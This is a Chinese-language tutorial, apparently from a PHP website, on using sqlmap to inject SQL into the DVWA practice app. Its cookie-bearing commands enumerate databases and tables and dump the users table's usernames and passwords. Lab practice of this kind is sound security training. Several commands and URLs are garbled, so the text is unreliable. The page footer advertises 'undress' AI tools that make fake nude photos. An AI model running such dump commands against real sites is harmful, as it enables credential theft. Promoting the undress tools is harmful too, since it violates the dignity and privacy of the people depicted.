使用sqlmap對dvwa進行自動化注入
設定dvwa等級為low
#開啟dvwa的SQL Injection(SQL Injection (Blind) ),開啟瀏覽器偵錯,輸入user id並submit,以查看攔截到的請求。
可以看到是一個GET請求,url「http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#」
我們直接放到salmap測試一下,用-u指令 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit# "
可以看到這裡是需要登入的,否則跑不出來。所以我們需要加入一個cookie維持登入
6.使用burp suite代理程式抓包,取得登入的cookie,新增--dbs 爆資料 -u "http:// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low"#mycoo
## 7. 我們使用-D xxx指定檢視的資料庫,用--tables檢視該資料庫的所有表格:-u "http://192.168.1.222:8089/vul "http://192.168.1.222:8089/vulultiabilities/i/mitid Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables查看跑出來的結果:#8.我們用-D xxx -T ttt指定檢視的表,用--columns查看表的列-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns9.我們用-D xxx查看資料庫, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的資料-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu666rtp07 -D dvwa -T users -C password,user --dump- #將dvwa安全等級調至medium將抓取的資料包儲存為.txt文件,放到sqlmap的目錄下,直接-r 檔名--dbs(後續的參數自己加即可)
返回的網址
# 將抓取的封包儲存為.txt文件,放入sqlmap的目錄下,爆炸資料庫,指令: -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -- sql level 2 --dbs
爆炸表名
-
##-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables
爆列名
-r 1. "http://192.168.1.222:8089/vulnerabilities/sqli/" -
-- batch --level 2 -D dvwa -T user --columns###### ###### ############ 爆字段資料############ #######-r 1.txt --second-url " http://192.168.1.222:8089/vulnerabilities/sqli/" -- batch --level 2 -D dvwa -T users -C user,password --dump############ #### ################一些概念問題:######################二階注入:二階### ###sql注入--second-order有些時候注入點輸入的資料看回傳結果的時候並不是目前的頁面,而是另外的一個頁面, 這時候就需要你指定到哪個頁面取得回應判斷真假。 –second-url 後面跟著一個回傳的頁面的URL位址###################--batch:自動預設配置,不用手動按yes or no##### # level :Sqlmap一共有5個探測等級,預設是1。等級越高,表示偵測時使用的payload也越多。其中5級的payload最多,會自動破解出cookie、XFF等頭部注入。當然,等級越高,偵測的時間也越慢。這個參數會影響測試的注入點,GET和POST的資料都會進行測試,HTTP cookie在level為2時就會測試,HTTP User-Agent/Referer頭在level為3時就會測試。在不確定哪個參數為注入點時,為了確保準確性,建議設定level為5(速度也隨之變慢)
以上是Sqlmap自動化注入的範例分析的詳細內容。更多資訊請關注PHP中文網其他相關文章!

熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

AI Hentai Generator
免費產生 AI 無盡。

熱門文章

熱工具

禪工作室 13.0.1
強大的PHP整合開發環境

SublimeText3 Linux新版
SublimeText3 Linux最新版

Atom編輯器mac版下載
最受歡迎的的開源編輯器

SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)

VSCode Windows 64位元 下載
微軟推出的免費、功能強大的一款IDE編輯器